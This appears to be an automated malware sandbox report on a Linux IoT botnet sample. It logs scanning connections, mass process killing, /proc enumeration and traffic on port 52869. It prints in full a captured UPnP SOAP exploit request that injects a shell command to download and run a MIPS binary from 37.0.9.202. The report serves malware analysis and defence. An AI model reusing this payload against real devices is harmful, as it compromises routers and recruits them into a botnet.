    Source: /tmp/KHSQ48GkGn (PID: 5240)Socket: 0.0.0.0::52869
    Source: /tmp/KHSQ48GkGn (PID: 5240)Socket: 0.0.0.0::37215
    Source: /tmp/KHSQ48GkGn (PID: 5246)Socket: 0.0.0.0::0
    Source: /tmp/KHSQ48GkGn (PID: 5246)Socket: 0.0.0.0::23
    Source: /tmp/KHSQ48GkGn (PID: 5246)Socket: 0.0.0.0::53413
    Source: /tmp/KHSQ48GkGn (PID: 5246)Socket: 0.0.0.0::80
    Source: /tmp/KHSQ48GkGn (PID: 5246)Socket: 0.0.0.0::52869
    Source: /tmp/KHSQ48GkGn (PID: 5246)Socket: 0.0.0.0::37215
    Source: /usr/sbin/sshd (PID: 5282)Socket: [::]::22
    Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
    Source: unknownTCP traffic detected without corresponding DNS query: 206.194.156.138
    Source: unknownTCP traffic detected without corresponding DNS query: 125.129.249.138
    Source: unknownTCP traffic detected without corresponding DNS query: 25.70.181.181
    Source: unknownTCP traffic detected without corresponding DNS query: 220.113.215.9
    Source: unknownTCP traffic detected without corresponding DNS query: 217.255.168.232
    Source: unknownTCP traffic detected without corresponding DNS query: 166.74.202.230
    Source: unknownTCP traffic detected without corresponding DNS query: 150.109.214.41
    Source: unknownTCP traffic detected without corresponding DNS query: 52.90.213.10
    Source: unknownTCP traffic detected without corresponding DNS query: 200.215.81.202
    Source: unknownTCP traffic detected without corresponding DNS query: 104.224.13.77
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.70.33
    Source: unknownTCP traffic detected without corresponding DNS query: 130.28.149.184
    Source: unknownTCP traffic detected without corresponding DNS query: 96.201.139.255
    Source: unknownTCP traffic detected without corresponding DNS query: 35.136.62.182
    Source: unknownTCP traffic detected without corresponding DNS query: 95.167.0.227
    Source: unknownTCP traffic detected without corresponding DNS query: 121.25.40.214
    Source: unknownTCP traffic detected without corresponding DNS query: 70.84.157.15
    Source: unknownTCP traffic detected without corresponding DNS query: 160.133.156.140
    Source: unknownTCP traffic detected without corresponding DNS query: 142.115.95.227
    Source: unknownTCP traffic detected without corresponding DNS query: 114.102.104.253
    Source: unknownTCP traffic detected without corresponding DNS query: 39.139.100.131
    Source: unknownTCP traffic detected without corresponding DNS query: 178.190.60.237
    Source: unknownTCP traffic detected without corresponding DNS query: 73.39.66.156
    Source: unknownTCP traffic detected without corresponding DNS query: 181.57.157.100
    Source: unknownTCP traffic detected without corresponding DNS query: 201.213.120.178
    Source: unknownTCP traffic detected without corresponding DNS query: 201.117.243.218
    Source: unknownTCP traffic detected without corresponding DNS query: 83.201.179.55
    Source: unknownTCP traffic detected without corresponding DNS query: 37.184.118.222
    Source: unknownTCP traffic detected without corresponding DNS query: 50.47.163.241
    Source: unknownTCP traffic detected without corresponding DNS query: 222.34.109.173
    Source: unknownTCP traffic detected without corresponding DNS query: 120.129.69.218
    Source: unknownTCP traffic detected without corresponding DNS query: 175.189.11.173
    Source: unknownTCP traffic detected without corresponding DNS query: 62.168.105.201
    Source: unknownTCP traffic detected without corresponding DNS query: 143.176.102.143
    Source: unknownTCP traffic detected without corresponding DNS query: 87.208.95.111
    Source: unknownTCP traffic detected without corresponding DNS query: 75.118.16.242
    Source: unknownTCP traffic detected without corresponding DNS query: 173.215.107.199
    Source: unknownTCP traffic detected without corresponding DNS query: 94.107.225.189
    Source: unknownTCP traffic detected without corresponding DNS query: 198.78.142.151
    Source: unknownTCP traffic detected without corresponding DNS query: 65.216.168.5
    Source: unknownTCP traffic detected without corresponding DNS query: 186.98.216.146
    Source: unknownTCP traffic detected without corresponding DNS query: 98.55.213.57
    Source: unknownTCP traffic detected without corresponding DNS query: 165.93.137.71
    Source: unknownTCP traffic detected without corresponding DNS query: 182.83.51.112
    Source: unknownTCP traffic detected without corresponding DNS query: 204.204.219.191
    Source: unknownTCP traffic detected without corresponding DNS query: 152.168.105.67
    Source: unknownTCP traffic detected without corresponding DNS query: 206.67.153.224
    Source: unknownTCP traffic detected without corresponding DNS query: 40.14.31.0
    Source: unknownTCP traffic detected without corresponding DNS query: 60.179.111.222
    Source: unknownTCP traffic detected without corresponding DNS query: 93.157.0.165
    Source: KHSQ48GkGn, 5238.1.00000000114beee1.000000004c983291.r-x.sdmpString found in binary or memory: http://37.0.9.202/bins/Hilix.mips
    Source: KHSQ48GkGn, 5238.1.00000000114beee1.000000004c983291.r-x.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: KHSQ48GkGn, 5238.1.00000000114beee1.000000004c983291.r-x.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
    Source: unknownHTTP traffic detected: POST /picdesc.xml HTTP/1.1Host: 127.0.0.1:52869Content-Length: 630Accept-Encoding: gzip, deflateSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMappingAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Connection: keep-aliveData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6e 69 67 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 33 37 2e 30 2e 39 2e 32 30 32 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 20 2d 4f 20 6e 69 67 3b 20 63 68 6d 6f 64 20 37 37 37 20 6e 69 67 3b 20 2e 2f 6e 69 67 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf nig; wget http://37.0.9.202/bins/Hilix.mips -O nig; chmod 777 nig; ./nig realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></

    System Summary:

    barindex
    Sample tries to kill many processes (SIGKILL)Show sources
    Source: /tmp/KHSQ48GkGn (PID: 5246)SIGKILL sent: pid: 936, result: successful
    Source: /tmp/KHSQ48GkGn (PID: 5246)SIGKILL sent: pid: 5240, result: successful
    Source: /tmp/KHSQ48GkGn (PID: 5246)SIGKILL sent: pid: 720, result: successful
    Source: /tmp/KHSQ48GkGn (PID: 5246)SIGKILL sent: pid: 759, result: successful
    Source: /tmp/KHSQ48GkGn (PID: 5246)SIGKILL sent: pid: 788, result: successful
    Source: /tmp/KHSQ48GkGn (PID: 5246)SIGKILL sent: pid: 800, result: successful
    Source: /tmp/KHSQ48GkGn (PID: 5246)SIGKILL sent: pid: 847, result: successful
    Source: /tmp/KHSQ48GkGn (PID: 5246)SIGKILL sent: pid: 884, result: successful
    Source: /tmp/KHSQ48GkGn (PID: 5246)SIGKILL sent: pid: 1334, result: successful
    Source: /tmp/KHSQ48GkGn (PID: 5246)SIGKILL sent: pid: 1335, result: successful
    Source: /tmp/KHSQ48GkGn (PID: 5246)SIGKILL sent: pid: 1860, result: successful
    Source: /tmp/KHSQ48GkGn (PID: 5246)SIGKILL sent: pid: 1872, result: successful
    Source: /tmp/KHSQ48GkGn (PID: 5246)SIGKILL sent: pid: 2096, result: successful
    Source: /tmp/KHSQ48GkGn (PID: 5246)SIGKILL sent: pid: 2097, result: successful
    Source: /tmp/KHSQ48GkGn (PID: 5246)SIGKILL sent: pid: 2102, result: successful
    Source: /tmp/KHSQ48GkGn (PID: 5246)SIGKILL sent: pid: 2180, result: successful
    Source: /tmp/KHSQ48GkGn (PID: 5246)SIGKILL sent: pid: 2191, result: successful
    Source: /tmp/KHSQ48GkGn (PID: 5246)SIGKILL sent: pid: 2208, result: successful
    Source: ELF static info symbol of initial sample.symtab present: no
    Source: /tmp/KHSQ48GkGn (PID: 5246)SIGKILL sent: pid: 936, result: successful
    Source: /tmp/KHSQ48GkGn (PID: 5246)SIGKILL sent: pid: 5240, result: successful
    Source: /tmp/KHSQ48GkGn (PID: 5246)SIGKILL sent: pid: 720, result: successful
    Source: /tmp/KHSQ48GkGn (PID: 5246)SIGKILL sent: pid: 759, result: successful
    Source: /tmp/KHSQ48GkGn (PID: 5246)SIGKILL sent: pid: 788, result: successful
    Source: /tmp/KHSQ48GkGn (PID: 5246)SIGKILL sent: pid: 800, result: successful
    Source: /tmp/KHSQ48GkGn (PID: 5246)SIGKILL sent: pid: 847, result: successful
    Source: /tmp/KHSQ48GkGn (PID: 5246)SIGKILL sent: pid: 884, result: successful
    Source: /tmp/KHSQ48GkGn (PID: 5246)SIGKILL sent: pid: 1334, result: successful
    Source: /tmp/KHSQ48GkGn (PID: 5246)SIGKILL sent: pid: 1335, result: successful
    Source: /tmp/KHSQ48GkGn (PID: 5246)SIGKILL sent: pid: 1860, result: successful
    Source: /tmp/KHSQ48GkGn (PID: 5246)SIGKILL sent: pid: 1872, result: successful
    Source: /tmp/KHSQ48GkGn (PID: 5246)SIGKILL sent: pid: 2096, result: successful
    Source: /tmp/KHSQ48GkGn (PID: 5246)SIGKILL sent: pid: 2097, result: successful
    Source: /tmp/KHSQ48GkGn (PID: 5246)SIGKILL sent: pid: 2102, result: successful
    Source: /tmp/KHSQ48GkGn (PID: 5246)SIGKILL sent: pid: 2180, result: successful
    Source: /tmp/KHSQ48GkGn (PID: 5246)SIGKILL sent: pid: 2191, result: successful
    Source: /tmp/KHSQ48GkGn (PID: 5246)SIGKILL sent: pid: 2208, result: successful
    Source: classification engineClassification label: mal76.spre.troj.lin@0/2@0/0
    Source: KHSQ48GkGnJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/2033/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/2033/exe
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/1582/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/1582/exe
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/2275/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/1612/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/1612/exe
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/1579/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/1579/exe
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/1699/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/1699/exe
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/1335/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/1335/exe
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/1698/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/1698/exe
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/2028/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/2028/exe
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/1334/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/1334/exe
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/1576/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/1576/exe
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/2302/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/3236/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/2025/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/2025/exe
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/2146/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/2146/exe
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/910/exe
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/912/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/912/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/912/exe
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/759/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/759/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/759/exe
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/517/exe
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/2307/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/918/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/918/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/918/exe
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/1594/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/1594/exe
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/2285/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/2281/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/1349/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/1349/exe
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/1/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/1/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/1623/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/1623/exe
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/761/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/761/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/761/exe
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/1622/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/1622/exe
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/884/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/884/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/884/exe
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/1983/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/1983/exe
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/2038/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/2038/exe
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/1586/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/1586/exe
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/1465/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/1465/exe
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/1344/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/1344/exe
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/1860/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/1860/exe
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/1463/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/1463/exe
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/2156/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/2156/exe
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/800/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/800/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/800/exe
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/801/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/801/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/801/exe
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/1629/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/1629/exe
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/1627/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/1627/exe
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/1900/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/1900/exe
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/5042/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/491/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/491/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/491/exe
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/2294/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/2050/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/2050/exe
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/1877/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/1877/exe
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/772/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/772/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/772/exe
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/1633/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/1633/exe
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/1599/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/1599/exe
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/1632/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/1632/exe
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/1477/fd
    Source: /tmp/KHSQ48GkGn (PID: 5246)File opened: /proc/1477/exe

    Hooking and other Techniques for Hiding and Protection:

    barindex
    Uses known network protocols on non-standard portsShow sources
    Source: unknownNetwork traffic detected: HTTP traffic on port 45302 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36880 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36826 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36884 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52869 -> 36826
    Source: unknownNetwork traffic detected: HTTP traffic on port 36830 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52869 -> 36830
    Source: unknownNetwork traffic detected: HTTP traffic on port 45302 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 45302 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48406 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40722 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56652 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56678 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48406 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56678 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40722 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 45302 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56678 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56652 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56678 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35802 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48406 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40722 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56652 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35802 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49010 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49012 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56678 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49012 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56652 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49012 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49012 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40756 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43210 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53236 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49010 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53786 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 43210 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 53786
    Source: unknownNetwork traffic detected: HTTP traffic on port 53236 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49012 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56652 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43210 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53236 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35802 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36088 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43210 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56652 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56678 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53236 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36088 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49012 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48406 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36088 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59666 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49010 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40722 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59666 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37586 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37590 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56652 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37590 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37590 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59666 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36088 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43210 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37590 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46498 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56678 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46500 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53236 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37586 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56652 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59666 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37590 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44066 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58024 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44070 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49012 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58024 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36088 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57752 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56652 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58024 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35802 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57752 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 45302 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56678 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37590 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58022 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54360 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58028 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54364 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57752 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59666 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52892 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 58024 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37586 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57752 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43210 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56652 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49010 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60496 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33212 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33216 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56678 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53236 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52892 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 53420 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53424 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58024 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54844 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52918 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36088 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52928 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60496 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57752 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37590 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54844 -> 52869
